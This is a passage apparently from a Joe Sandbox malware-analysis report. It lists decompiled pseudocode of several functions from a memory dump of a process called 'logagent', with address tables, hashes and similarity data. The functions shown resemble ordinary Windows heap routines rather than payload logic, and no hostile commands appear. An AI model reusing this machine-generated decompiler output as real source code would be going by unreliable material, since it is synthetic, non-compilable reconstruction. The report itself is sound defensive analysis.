							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                              0x051c8a0a
                                              0x051c8a1c
                                              0x051c8a23
                                              0x051c8a2e
                                              0x051c8a30
                                              0x051c8a36
                                              0x051c8a3c
                                              0x051c8a3e
                                              0x051c8a4a
                                              0x051c8a52
                                              0x051c8a9c
                                              0x051c8aae
                                              0x051c8a58
                                              0x051c8a5e
                                              0x051c8a6a
                                              0x051c8a6f
                                              0x051c8a75
                                              0x051c8a7d
                                              0x051c8a85
                                              0x051c8a86
                                              0x051c8a89
                                              0x051c8a93
                                              0x051c8a99
                                              0x051c8a9b
                                              0x00000000
                                              0x051c8aaf
                                              0x051c8abe
                                              0x051c8ac3
                                              0x051c8acb
                                              0x051c8ad7
                                              0x051c8ae0
                                              0x051c8af1
                                              0x00000000
                                              0x051c8af1
                                              0x051c8acd
                                              0x051c8ad5
                                              0x051c8afb
                                              0x051c8afd
                                              0x051c8aff
                                              0x051c8b07
                                              0x051c8b22
                                              0x051c8b24
                                              0x051c8b2a
                                              0x051c8b2e
                                              0x051c8b3f
                                              0x051c8b78
                                              0x051c8b41
                                              0x051c8b52
                                              0x051c8b54
                                              0x051c8b5c
                                              0x051c8b74
                                              0x051c8b74
                                              0x051c8b5c
                                              0x051c8b3f
                                              0x051c8b5e
                                              0x051c8b61
                                              0x051c8b64
                                              0x051c8b64
                                              0x051c8b6c
                                              0x051c8b6c
                                              0x051c8b11
                                              0x05219cd5
                                              0x05219cd5
                                              0x051c8b17
                                              0x051c8b1a
                                              0x051c8b1a
                                              0x00000000
                                              0x051c8ad5
                                              0x051c8a89

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcde38d744d78e283a3cb06f265765b1a9dc2b4d4867a4b90ca283c1f4c4153f
                                              • Instruction ID: 23c03ef5d87f644755dedc2121ca5e455411d0998a893be31b81e72b79c55850
                                              • Opcode Fuzzy Hash: fcde38d744d78e283a3cb06f265765b1a9dc2b4d4867a4b90ca283c1f4c4153f
                                              • Instruction Fuzzy Hash: BA418EB5A00228ABDB24DF15C8C8BAABBB5FB54300F1145EAD81997342E771DE81CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527FDE2 Relevance: .1, Instructions: 116COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E0527FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0527FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05280A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E051D7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05271608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05282B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0527C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0527DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E051D7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0527A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                              0x0527fde7
                                              0x0527fde8
                                              0x0527fdec
                                              0x0527fdee
                                              0x0527fdf5
                                              0x0527fdf7
                                              0x0527fdfc
                                              0x0527fe19
                                              0x0527fe22
                                              0x0527fe26
                                              0x0527fec6
                                              0x0527fecd
                                              0x0527fed5
                                              0x0527fee7
                                              0x0527fed7
                                              0x0527fee0
                                              0x0527fee0
                                              0x0527feef
                                              0x0527ff00
                                              0x0527ff02
                                              0x0527ff07
                                              0x0527ff07
                                              0x00000000
                                              0x0527feef
                                              0x0527fe33
                                              0x0527fe55
                                              0x0527fe59
                                              0x0527fe5b
                                              0x0527fe5e
                                              0x0527fe69
                                              0x0527fe6d
                                              0x0527fe6d
                                              0x0527fe69
                                              0x0527fe35
                                              0x0527fe41
                                              0x0527fe41
                                              0x0527fe79
                                              0x0527fe8b
                                              0x0527fe7b
                                              0x0527fe84
                                              0x0527fe84
                                              0x0527fe93
                                              0x00000000
                                              0x0527fea8
                                              0x0527feba
                                              0x00000000
                                              0x0527feba
                                              0x0527fdfe
                                              0x0527fe01
                                              0x0527fe02
                                              0x0527fe08
                                              0x0527ff0c
                                              0x0527ff14
                                              0x0527ff14

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction ID: 956ae4739cf6147a4ac0286207c72ad7af5c0e4dbe05221fa9e0e7103dcb1487
                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction Fuzzy Hash: B6310A323286496FD322DB68C949F6AB7E6FFC5650F184058E94A8B781DB74DC41C720
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052822AE Relevance: .1, Instructions: 116COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E052822AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E052821E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x519ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x519ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x519ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x519ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x52a6110; // 0x5d667ca3
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x52a6110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E051CFFB0(_t77, _t114, _t114);
						}
						_t63 = E05282FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E051D2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                              0x052822b9
                                              0x052822c2
                                              0x052822c6
                                              0x052822c8
                                              0x052822d8
                                              0x052822e2
                                              0x05282303
                                              0x05282314
                                              0x05282321
                                              0x0528234a
                                              0x0528235b
                                              0x0528236c
                                              0x05282372
                                              0x05282376
                                              0x0528238f
                                              0x0528238f
                                              0x052823b4
                                              0x052823c6
                                              0x052823c9
                                              0x052823cc
                                              0x052823cf
                                              0x052823cf
                                              0x052823e9
                                              0x052823ee
                                              0x052823f8
                                              0x052823fb
                                              0x052823fb
                                              0x05282403
                                              0x0528240a
                                              0x05282378
                                              0x0528237b
                                              0x05282381
                                              0x05282385
                                              0x05282385
                                              0x0528238d
                                              0x00000000
                                              0x00000000
                                              0x0528238d
                                              0x05282376
                                              0x05282417

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 958da2a3007be565d3dab6b71bdd08f038a616029073e44e1208a64ffed8acba
                                              • Instruction ID: 4c6da31989b0f857b66b0c04c9a460cee6c4f428eda7eefd1c9b2687a447547e
                                              • Opcode Fuzzy Hash: 958da2a3007be565d3dab6b71bdd08f038a616029073e44e1208a64ffed8acba
                                              • Instruction Fuzzy Hash: 7C4125712143528BC708DF68C8A597ABBE1FF95321F184A5DF4E68B2C2CB34D809C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052820A8 Relevance: .1, Instructions: 114COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E052820A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x52a6110; // 0x5d667ca3
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x52a6110; // 0x5d667ca3
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E05282E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x52a6110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E05282E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x52a6110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E05282E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x52a6110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x52a6110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                              0x052820a8
                                              0x052820b0
                                              0x052820b6
                                              0x052820ba
                                              0x052820be
                                              0x052820c4
                                              0x052820cb
                                              0x052820db
                                              0x052820e4
                                              0x052820e7
                                              0x052820e9
                                              0x052820ef
                                              0x052820f1
                                              0x052820fe
                                              0x05282102
                                              0x05282105
                                              0x05282105
                                              0x05282107
                                              0x0528210d
                                              0x05282112
                                              0x05282115
                                              0x05282120
                                              0x05282120
                                              0x05282107
                                              0x05282126
                                              0x05282131
                                              0x05282133
                                              0x0528213e
                                              0x0528213e
                                              0x05282140
                                              0x05282146
                                              0x0528214b
                                              0x05282156
                                              0x05282156
                                              0x05282140
                                              0x0528215f
                                              0x05282165
                                              0x05282170
                                              0x05282172
                                              0x0528217d
                                              0x0528217d
                                              0x0528217f
                                              0x05282185
                                              0x05282192
                                              0x05282192
                                              0x0528217f
                                              0x05282170
                                              0x05282197
                                              0x05282199
                                              0x052821a1
                                              0x052821b1
                                              0x052821bf
                                              0x052821d6
                                              0x052821d6
                                              0x052821bf
                                              0x052821dd
                                              0x052821e5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a7ee5e97c1905e9314e2e3d35a42ab3e02e0bd315445c52d0f08fda82ffeb70
                                              • Instruction ID: 14c87196c5d11733fe6fd40210c6fd777b57d162f3f675f2aad0bb6d9b9afae7
                                              • Opcode Fuzzy Hash: 4a7ee5e97c1905e9314e2e3d35a42ab3e02e0bd315445c52d0f08fda82ffeb70
                                              • Instruction Fuzzy Hash: AD41BE33E2402ACBCB18DFA8C495479B7B5FF4830576A02BDD815AB281DB34BD41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05282D07 Relevance: .1, Instructions: 112COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E05282D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E052821E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x519ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x519ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x519ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x519ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x519ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x52a6110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x52a6110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x52a6110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E051CB090(_v24, _t91, _v12, _t29);
			}
























                                              0x05282d1f
                                              0x05282d2c
                                              0x05282d31
                                              0x05282d33
                                              0x05282d42
                                              0x05282d4b
                                              0x05282d51
                                              0x05282d5d
                                              0x05282d62
                                              0x05282d6e
                                              0x05282d71
                                              0x05282d7d
                                              0x05282d87
                                              0x05282d8d
                                              0x05282d91
                                              0x05282da5
                                              0x05282db7
                                              0x05282dc8
                                              0x05282dcf
                                              0x05282dd1
                                              0x05282dd3
                                              0x05282dd6
                                              0x05282ddb
                                              0x05282ddd
                                              0x00000000
                                              0x05282ddf
                                              0x05282df5
                                              0x05282e0e
                                              0x05282e12
                                              0x05282e1a
                                              0x05282e1c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05282e14
                                              0x05282e16
                                              0x05282e22
                                              0x05282e22
                                              0x05282e18
                                              0x05282e18
                                              0x00000000
                                              0x05282e18
                                              0x05282e16
                                              0x05282df7
                                              0x05282df7
                                              0x05282dfc
                                              0x05282e04
                                              0x05282e06
                                              0x05282e1e
                                              0x05282e1e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05282dfe
                                              0x05282e00
                                              0x05282e08
                                              0x05282e08
                                              0x05282e02
                                              0x05282e02
                                              0x00000000
                                              0x05282e02
                                              0x05282e00
                                              0x05282dfc
                                              0x00000000
                                              0x05282df5
                                              0x05282ddf
                                              0x05282e26
                                              0x05282e26
                                              0x05282e3c

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a5be9e199cc26f47124499181012dcd9564e997bf55ac6e09938d0932457762
                                              • Instruction ID: 5136a135b3224da28111f702eb583f99e7ae2de15acf0380c9fccb34b41c5129
                                              • Opcode Fuzzy Hash: 9a5be9e199cc26f47124499181012dcd9564e997bf55ac6e09938d0932457762
                                              • Instruction Fuzzy Hash: 31414C359151658FCB05CBA5C4906BEBFF5FF46201F1D41AAEC85DB282DA35E50AC3B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527EA55 Relevance: .1, Instructions: 111COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E0527EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E051D2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0527E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E051BF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E051CFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0527AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0527BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E051D7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0526FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E051CFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0527A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                              0x0527ea55
                                              0x0527ea66
                                              0x0527ea68
                                              0x0527ea6c
                                              0x0527ea6f
                                              0x0527ea72
                                              0x0527ea75
                                              0x0527ea7a
                                              0x0527ea7a
                                              0x0527ea7e
                                              0x0527ea80
                                              0x0527ea85
                                              0x0527ea8b
                                              0x0527eab5
                                              0x0527eabc
                                              0x0527eabf
                                              0x0527eabf
                                              0x0527eaca
                                              0x0527eace
                                              0x0527ead0
                                              0x0527eae4
                                              0x0527eaeb
                                              0x0527eaf0
                                              0x0527eaf5
                                              0x0527eb09
                                              0x0527eb0d
                                              0x0527eb1d
                                              0x0527eb2d
                                              0x0527eb38
                                              0x0527eb3d
                                              0x0527eb41
                                              0x0527eb4a
                                              0x0527eb60
                                              0x0527eb4c
                                              0x0527eb52
                                              0x0527eb59
                                              0x0527eb59
                                              0x0527eb68
                                              0x0527eb71
                                              0x0527eb71
                                              0x0527ea8d
                                              0x0527ea8f
                                              0x0527ea92
                                              0x0527ea97
                                              0x0527ea97
                                              0x0527ea9b
                                              0x0527ea9c
                                              0x0527ea9e
                                              0x0527eaa6
                                              0x0527eaa6
                                              0x0527eb7e

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                              • Instruction ID: 261b2aac894e400d9d5bfd3b37eb6b6ba2b4c2d64fcb2759a7ce88a743b01aa2
                                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                              • Instruction Fuzzy Hash: 3B31C17271470A9BC719DF34C884E6BB7AAFFC4210F05496DF55687641EB34E809CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052369A6 Relevance: .1, Instructions: 108COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E052369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x52ad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L051C6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05236BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E051F9980() >= 0) {
							E051D2280(_t56, 0x52a8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x52a8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x52a8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E051BB6F0(0x519c338, 0x519c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E051F9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E051F95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E051CFFB0(_t68, _t77, 0x52a8778);
				}
				_pop(_t78);
				return E051FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                              0x052369b5
                                              0x052369be
                                              0x052369c3
                                              0x052369c9
                                              0x052369cc
                                              0x052369d1
                                              0x052369d3
                                              0x052369de
                                              0x052369e1
                                              0x052369ea
                                              0x052369f6
                                              0x052369fe
                                              0x05236a13
                                              0x05236a14
                                              0x05236a15
                                              0x05236a16
                                              0x05236a1e
                                              0x05236a26
                                              0x05236a31
                                              0x05236a36
                                              0x05236a37
                                              0x05236a40
                                              0x05236a49
                                              0x05236a4a
                                              0x05236a53
                                              0x05236a59
                                              0x05236a5d
                                              0x05236a5e
                                              0x05236a64
                                              0x05236a67
                                              0x05236a6a
                                              0x05236a6d
                                              0x05236a70
                                              0x05236a77
